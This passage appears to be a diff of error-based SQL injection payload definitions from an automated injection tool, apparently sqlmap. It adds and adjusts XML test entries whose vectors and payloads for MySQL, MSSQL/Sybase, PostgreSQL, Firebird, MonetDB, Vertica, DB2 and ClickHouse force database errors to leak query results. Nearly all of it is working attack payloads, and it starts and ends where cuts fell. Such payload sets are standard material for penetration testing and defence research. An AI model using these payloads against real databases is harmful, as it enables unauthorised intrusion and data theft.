         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
         <request>
@@ -1406,7 +1574,7 @@ Tag: <test>
         <stype>1</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;IIF([INFERENCE],1,1/0)</vector>
         <request>
@@ -1426,7 +1594,7 @@ Tag: <test>
         <stype>1</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
         <request>

data/xml/payloads/error_based.xml

@@ -7,7 +7,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
@@ -28,11 +28,11 @@
 
     <test>
         <!-- It does not work against ORDER BY or GROUP BY clause -->
-        <title>MySQL &gt;= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)</title>
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
@@ -56,7 +56,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
         <request>
@@ -72,11 +72,11 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.5 OR error-based - WHERE, HAVING clause (EXP)</title>
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
         <request>
@@ -91,12 +91,52 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,8,9</clause>
+        <where>1</where>
+        <vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
         <stype>2</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
         <request>
@@ -113,11 +153,11 @@
 
     <test>
         <!-- It does not work against ORDER BY or GROUP BY clause -->
-        <title>MySQL &gt;= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)</title>
+        <title>MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>
         <stype>2</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
         <request>
@@ -135,17 +175,17 @@
     <test>
         <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
-        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
         <request>
             <!-- These work as good as ELT(), but are longer
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
             -->
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -159,18 +199,38 @@
     <test>
         <title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
-        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
         <request>
             <!-- These work as good as ELT(), but are longer
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
             -->
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>7</clause>
+        <where>1</where>
+        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
+        <request>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -184,9 +244,9 @@
     <test>
         <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
@@ -208,9 +268,9 @@
     <test>
         <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>1</level>
         <risk>3</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
         <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@@ -235,7 +295,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
         <request>
@@ -259,7 +319,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
         <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@@ -282,9 +342,9 @@
     <test>
         <title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
         <request>
@@ -305,11 +365,11 @@
 
     <test>
         <!-- It does not work against ORDER BY or GROUP BY clause -->
-        <title>MySQL &gt;= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)</title>
+        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
         <request>
@@ -332,9 +392,9 @@
     <test>
         <title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>2</where>
         <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
         <request>
@@ -354,7 +414,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
         <request>
@@ -373,7 +433,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
         <request>
@@ -388,11 +448,51 @@
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,8,9</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -404,16 +504,15 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>
         <stype>2</stype>
-        <level>1</level>
+        <level>3</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -425,7 +524,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -434,7 +532,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
         <request>
@@ -446,7 +544,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -455,7 +552,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
         <request>
@@ -467,49 +564,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,9</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1,9</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -672,7 +726,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,9</clause>
+        <clause>1</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -689,9 +743,9 @@
     <test>
         <title>Firebird OR error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>3</risk>
-        <clause>1,9</clause>
+        <clause>1</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -704,6 +758,159 @@
             <dbms>Firebird</dbms>
         </details>
     </test>
+
+    <test>
+        <title>MonetDB AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MonetDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MonetDB OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MonetDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Vertica AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Vertica</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Vertica OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Vertica</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
     <!--
          TODO: if possible, add payload for SQLite, Microsoft Access,
          and SAP MaxDB - no known techniques at this time
@@ -777,6 +984,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
